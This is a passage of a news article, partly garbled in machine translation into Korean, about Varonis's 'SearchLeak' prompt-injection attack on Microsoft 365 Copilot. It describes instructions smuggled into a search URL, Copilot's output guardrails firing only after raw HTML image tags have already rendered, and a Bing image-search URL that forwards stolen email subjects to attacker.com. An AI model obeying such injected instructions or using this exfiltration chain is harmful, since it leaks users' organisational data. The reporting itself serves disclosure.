매개변수-프롬프트 주입을 수행하기 위해 공격자는 https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= 구문의 URL이 포함된 이메일을 대상에게 보냅니다. 필드에는 지침이 포함되어 있습니다. 부조종사는 쉽게 이에 따랐습니다.
연구원들은 월요일에 “검색 기능은 정확히 공격자가 필요로 하는 것입니다. 제한된 기능으로도 중요한 정보에 액세스할 수 있는 사용자이면 충분하기 때문입니다.”라고 썼습니다. “데이터를 유출하기 위해 공격자는 Copilot에게 ‘사용자의 이메일을 검색’하고 제목을 추출하여 이미지 URL에 삽입하도록 지시하는 URL을 제작합니다.” 피해자는 아무 것도 입력하지 않습니다. 링크를 클릭하면 Copilot이 나머지 작업을 수행합니다.
일반적으로 난간 포장 출력은 다음과 같습니다. blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.
연구원들은 다음과 같이 썼습니다.
따라서 순서는 다음과 같습니다.
- Copilot은 다음을 포함하는 응답 스트리밍을 시작합니다.
꼬리표
- 브라우저는
렌더링하고 src URL에 대한 HTTP 요청을 시작합니다.
- Copilot이 생성을 완료합니다. 가드레일은 모든 것을 감싸줍니다
- 너무 늦었어요! 요청이 이미 떠났습니다.
이제 연구원들은 대상의 브라우저에서 이미지 요청을 실행했습니다. 앞서 언급했듯이 문제는 Copilot이 대부분의 웹사이트에 이미지 요청을 보내지 않는다는 것입니다. 이 가드레일을 확장하기 위해 익스플로잇 체인은 Microsoft의 Bing 검색 엔진을 일종의 트램폴린으로 사용했습니다. Copilot 콘텐츠 보안 정책에 따라 Bing은 그러한 요청을 보낼 수 있는 사이트 중 하나입니다. 그런 다음 Bing은 요청에 포함된 공격자가 제어하는 도메인으로 요청을 보냅니다. 요청은 다음과 같습니다.
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
Varonis는 공격 이름을 SearchLeak으로 명명했습니다.
“SearchLeak은 Microsoft의 엔터프라이즈 계층을 대상으로 하기 때문에 폭발 반경은 개인 데이터에만 국한되지 않습니다. 이메일, 회의 초대, 메모를 포함하여 사용자가 조직 내부에 액세스할 수 있는 모든 것을 표면화할 수 있습니다.”라고 회사 연구원은 썼습니다. “SharePoint 문서, OneDrive 파일 및 기타 인덱싱된 비즈니스 콘텐츠. M365가 환경에 연결되는 방식에 따라 폭발 반경이 훨씬 더 넓어질 수 있습니다.”
언급한 대로 Microsoft는 화요일에 SearchLeak이 악용한 취약점을 수정했습니다. 그러나 이러한 SNAFU의 근본 원인을 해결할 수 있는 알려진 방법이 없으므로 공격자는 필연적으로 새로 구성된 가드레일을 우회할 새로운 방법을 찾을 것이며 프로세스는 다시 반복됩니다.
관련 정보는 아래 링크에서 확인하세요